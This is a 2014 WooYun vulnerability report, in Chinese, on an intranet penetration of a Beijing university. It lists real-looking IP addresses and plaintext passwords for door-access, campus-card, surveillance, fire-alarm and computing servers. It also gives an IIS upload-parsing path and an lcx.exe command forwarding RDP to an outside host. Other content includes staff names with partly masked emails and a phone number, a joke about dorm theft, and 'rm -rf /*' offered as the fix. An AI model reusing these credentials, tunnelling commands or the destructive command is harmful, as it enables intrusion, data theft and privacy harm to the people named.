漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-069486
漏洞标题:北京科技大学内网渗透测试
相关厂商:北京科技大学
漏洞作者: xiaolan
提交时间:2014-07-24 09:57
修复时间:2014-09-07 09:58
公开时间:2014-09-07 09:58
漏洞类型:服务弱口令
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-24: 细节已通知厂商并且等待厂商处理中
2014-07-29: 厂商已经确认,细节仅向厂商公开
2014-08-08: 细节向核心白帽子及相关领域专家公开
2014-08-18: 细节向普通白帽子公开
2014-08-28: 细节向实习白帽子公开
2014-09-07: 细节向公众公开
简要描述:
北京科技大学内网渗透测试 [可远程点炮(火警),根据车牌号找手机号,任意修改一卡通信息,任意控制门禁系统,改水电停车费,控制计算机集群,远程删改监控(从此偷宿舍再也不怕被抓了)]!!!............
河北人民发来贺电!!!...............
北京的土豪真多啊,大学生名下好多好多车.............................
详细说明:
通过一个分站渗透进内网
http://marx.ustb.edu.cn/Uploads/file/3.asp;%281%29.jpg a
http://marx.ustb.edu.cn/NewsConfig.aspx admin
后台
admin / admin
管理员1 / aa
管理员2 / aa
李楠 / 18600641650
id name department ptitles pic email drOrM researchD researchR post
17 李晓光 马克思主义原理研究所 教授 Uploads\pdf\20120401150108.jpg l***y@ustb.edu.cn 11
18 陆俊 马克思主义原理研究所 教授 Uploads\pdf\20120401150148.jpg j***u@hss.ustb.edu.cn 11
19 彭庆红 思想政治教育研究所 教授 Uploads\pdf\20120401150551.jpg p*****8@sohu.com 11
20 时立荣 无 教授 Uploads\pdf\20120401150610.jpg sl****001@yahoo.com.cn 10
21 王民忠(兼) 思想政治教育研究所 教授 Uploads\pdf\20120401150353.jpg w***z@acto.org.cn 11
22 左鹏 思想政治教育研究所 教授 Uploads\pdf\20120401150444.jpg zp2233@263.net 11 思想政治教育
25 王志明 历史与文化研究所 副教授 wa****ng1966@163.com 01
26 王爱红 思想政治教育研究所 副教授 wan****ong1003@163.com 01
29 刘文霞 科技与社会研究所 副教授 Uploads\pdf\20120401154610.jpg Lw****@sina.com 01
30 刘莉 思想政治教育研究所 副教授 li****ess@126.com 01
31 刘丽敏 历史与文化研究所 副教授 Uploads\pdf\20120401155023.jpg 01
34 张北根 历史与文化研究所 教授 bgz*****g2002@yahoo.com.cn 01
35 杨彦强 马克思主义中国化研究所 副教授 y*****9@263.net 01
36 陆宁 马克思主义中国化研究所 教授 z****02@263.net 01
37 钱振华 科技与社会研究所 副教授 ro*****ua@yahoo.com.cn 01
38 颜峰 科技与社会研究所 教授 ya****d@yahoo.com.cn 01
39 盖明 思想政治教育研究所 讲师 ge****8@163.com 00
40 鲁春霞 思想政治教育研究所 讲师 L***5@sina.com 00
41 周鑫 思想政治教育研究所 讲师 Uploads\pdf\20120401161914.jpg leo****515@yahoo.com.cn 00
42 孙文营 马克思主义原理研究所 讲师 00
43 梁峰 马克思主义原理研究所 讲师 Uploads\pdf\20120401162220.jpg Lia*****12@sina.com 00
44 李红梅 马克思主义中国化研究所 讲师 li****xkw@163.com 00
45 赵静 马克思主义中国化研究所 副教授 Uploads\pdf\20120401162509.jpg Sdz*****019@163.com 01
46 杨兴业 马克思主义中国化研究所 讲师 ya*****e@ustb.edu.cn 00
47 王蓉霞 历史与文化研究所 副教授 wan******xi***73@sina.com 01
50 宋琳 科技与社会研究所 副教授 vi****in@tom.com 00
52 陈曦(兼) 思想政治教育研究所 教授 01 北京科技大学党委副书记
54 蒋宏潮(兼) 思想政治教育研究所 副教授 01 网络思想政治教育 教育部思政司思政处副处长
55 李林(兼) 科技与社会研究所 教授 00
57 马晓燕 马克思主义原理研究所 副教授 01
58 赵锋(兼) 思想政治教育研究所 教授 Uploads\pdf\20130620220042.JPG 01 思想政治教育 北京电子科技职业学院党委副书记
59 许峰(兼) 思想政治教育研究所 教授 Uploads\pdf\20130620220816.jpg 01 全球化与当代资本主义问题 北京联合大学人文社科部副主任
60 韩强(兼) 历史与文化研究所 教授 Uploads\pdf\20130620221249.jpg 01 党的建设、干部制度改革、高校党的建设 北京联合大学人文社科部主任
61 闫拓时(兼) 思想政治教育研究所 教授 Uploads\pdf\20130620221803.jpg 01 高等教育管理、大学生思想政治工作 中国音乐学院党委书记
62 宋伟 马克思主义中国化研究所 讲师 Uploads\pdf\20140429114700.jpg guoqing0086@126.com 00 社会转型与行政体制改革研究、廉政建设研究
c:\recycler\lcx.exe -slave 215.51.41.221 1331 127.0.0.1 3389
222.28.65.254
255.255.255.0
222.28.65.1
Administrator / Marx?2012
目标.
京C81523 (车主资料,可能在北京科技大学上过学) ------------ ok.
2014-07-14宿舍监控 -----------------ok................
IP段:222.28.31.1 222.28.79.254
202.204.48.1 202.204.63.254
10.0.0.0 - 10.255.255.255
172.16.x.x - 交换机段
222.28.63.198 北京科技大学安全防范系统工程 (可控制防火警报) - 1.jpg
222.28.63.198 - 192.168.2.187 - 门禁管理 - 2.jpg
222.28.63.198 - 192.168.3.110 - 监控1
222.28.63.198 - 192.168.0.5 - 一卡通以及停车服务器 - 3.jpg (待拖)____下午已拖
222.28.63.198 - 192.168.0.5 - 车辆进出库记录
222.28.65.254 马克思学院
222.28.61.132 - 目测经济数据库,各种雇员信息,各种信用卡 (待拖)____废弃,过期
222.28.70.253 - 目测机房管控中心
???????? - 城市消防服务器 - 4.jpg
222.28.61.105 - 北京科技大学计算机管理平台 - 5.jpg
222.28.40.101 - 计算机集群
222.28.40.101 root / 111111
222.28.61.105 root/123456
222.28.61.132 sa/123456
222.28.63.198 (双网卡)
administrator / kjdx
北京科技大学安全防范系统工程
进入后 192.168.2.187 administrator / kjdx 门禁,一卡通服务器
192.168.3.110 监控 administrator / null
192.168.0.5 一卡通服务器 administrator / 82376233
222.28.70.253 sa/sa === Administrator / Th1010
漏洞证明:
修复方案:
不会..........
rm -rf /*
版权声明:转载请注明来源 xiaolan@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-07-29 09:04
厂商回复:
CNVD确认第一层风险,已经转由CNCERT向教育网应急组织——赛尔网络公司通报,其反馈称已经协调北京科技大学方面处置。
最新状态:
暂无